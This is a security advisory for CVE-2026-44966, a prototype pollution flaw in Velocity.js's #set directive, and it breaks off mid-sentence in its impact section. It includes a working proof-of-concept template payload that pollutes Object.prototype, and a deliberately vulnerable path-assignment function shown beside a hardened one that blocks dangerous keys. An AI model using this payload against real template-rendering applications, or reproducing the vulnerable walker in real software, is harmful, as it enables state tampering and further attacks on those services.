CVSS 8.3 HIGH Vulnerability

CVE-2026-44966: Velocity.js has a Prototype Pollution vulnerability through #set path assignment



📋 Vulnerability Details

CVE ID: CVE-2026-44966
Vendor: npm
Affected Product: velocityjs
Vulnerability Type: Prototype Pollution
CVSS Score: 8.3 (HIGH)
CISA KEV: Not listed
Actively Exploited: No known exploitation
Patch Status: see vendor advisory
Reported By: CYBERDUDEBIVASH SENTINEL APEX Intelligence (via github_advisories)

🔬 Technical Analysis


Summary

A prototype pollution vulnerability was discovered in Velocity.js. When a `#set` directive assigns to a property path, the path is walked and the final step is a bare `…)[key] = val` on whatever object the walk reached. Because there is no validation or filtering to block sensitive keys such as `__proto__`, `constructor`, or `prototype`, an attacker who controls template content can walk up the prototype chain and pollute the global `Object.prototype`.

PoC

```javascript
const { render } = require('velocityjs');

delete Object.prototype.polluted;
console.log({}.polluted); // undefined

// The #set path $__proto__.polluted resolves to Object.prototype.polluted
render('#set($__proto__.polluted = "hacked")', {});
console.log({}.polluted); // "hacked"

delete Object.prototype.polluted; // clean up the global prototype
```
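The PoC above needs velocityjs installed. To show the mechanism offline, here is an added example (not Velocity.js's own code): a minimal stand-in for a path assignment of the kind `#set` performs, in its vulnerable form next to a hardened form that rejects the dangerous keys and only descends through the context's own properties. The function names `assignPathUnsafe`, `assignPathSafe`, `isPolluted` and `demo`, and the sample paths, are assumptions for illustration.

```javascript
// Added example, not Velocity.js code: a stand-in for a #set-style path
// assignment. Names (assignPathUnsafe, assignPathSafe, isPolluted, demo) and
// the sample paths are assumptions for illustration.

const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Vulnerable pattern: walk the path, then do a bare obj[key] = val on whatever
// the walk reached. With ['__proto__', 'polluted'] the walk reads
// ctx.__proto__ (Object.prototype) and writes to it; the same happens via
// ['constructor', 'prototype', ...] because ctx.constructor is Object.
function assignPathUnsafe(ctx, path, val) {
  let obj = ctx;
  for (let i = 0; i < path.length - 1; i++) {
    const key = path[i];
    if (obj[key] === undefined || obj[key] === null) obj[key] = {};
    obj = obj[key];
  }
  obj[path[path.length - 1]] = val;
}

// Hardened pattern: refuse forbidden keys anywhere in the path, and only
// descend into the context's own (non-inherited) object properties, so the
// walk can never leave the caller's context. The final write uses
// defineProperty so no setter on the chain is invoked.
function assignPathSafe(ctx, path, val) {
  for (const key of path) {
    if (FORBIDDEN_KEYS.has(String(key))) {
      throw new Error(`refusing to assign through forbidden key: ${key}`);
    }
  }
  let obj = ctx;
  for (let i = 0; i < path.length - 1; i++) {
    const key = path[i];
    const own = Object.prototype.hasOwnProperty.call(obj, key);
    if (!own || typeof obj[key] !== 'object' || obj[key] === null) obj[key] = {};
    obj = obj[key];
  }
  Object.defineProperty(obj, path[path.length - 1], {
    value: val, writable: true, enumerable: true, configurable: true,
  });
}

// A fresh object literal has no own properties, so any defined value for
// `name` must have come from the prototype chain.
function isPolluted(name) {
  return ({})[name] !== undefined;
}

function demo() {
  const results = {};

  // 1. vulnerable walker, path equivalent to #set($__proto__.polluted = "hacked")
  assignPathUnsafe({}, ['__proto__', 'polluted'], 'hacked');
  results.unsafeViaProto = isPolluted('polluted');
  delete Object.prototype.polluted;

  // 2. vulnerable walker, the constructor.prototype route
  assignPathUnsafe({}, ['constructor', 'prototype', 'polluted'], 'hacked');
  results.unsafeViaConstructor = isPolluted('polluted');
  delete Object.prototype.polluted;

  // 3. hardened walker refuses the same two paths
  let rejected = 0;
  for (const path of [['__proto__', 'polluted'], ['constructor', 'prototype', 'polluted']]) {
    try { assignPathSafe({}, path, 'hacked'); } catch (e) { rejected++; }
  }
  results.safeRejected = rejected;
  results.safePolluted = isPolluted('polluted');

  // 4. hardened walker still performs a legitimate nested assignment
  const ctx = {};
  assignPathSafe(ctx, ['user', 'name'], 'alice');
  results.legit = ctx.user.name;
  return results;
}

console.log(demo());
```

The own-property check is the part that matters even without the deny-list: `$user.name` still works because `user` is created as an own property of the context, while `$__proto__` and `$constructor` are inherited and so are never followed.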

Impact

• Vulnerability Type: Prototype Pollution
• Who is impacted: Any application that renders Velocity templates where the template content can be influenced or controlled by untrusted users.
• Severity: High. Prototype pollution can often
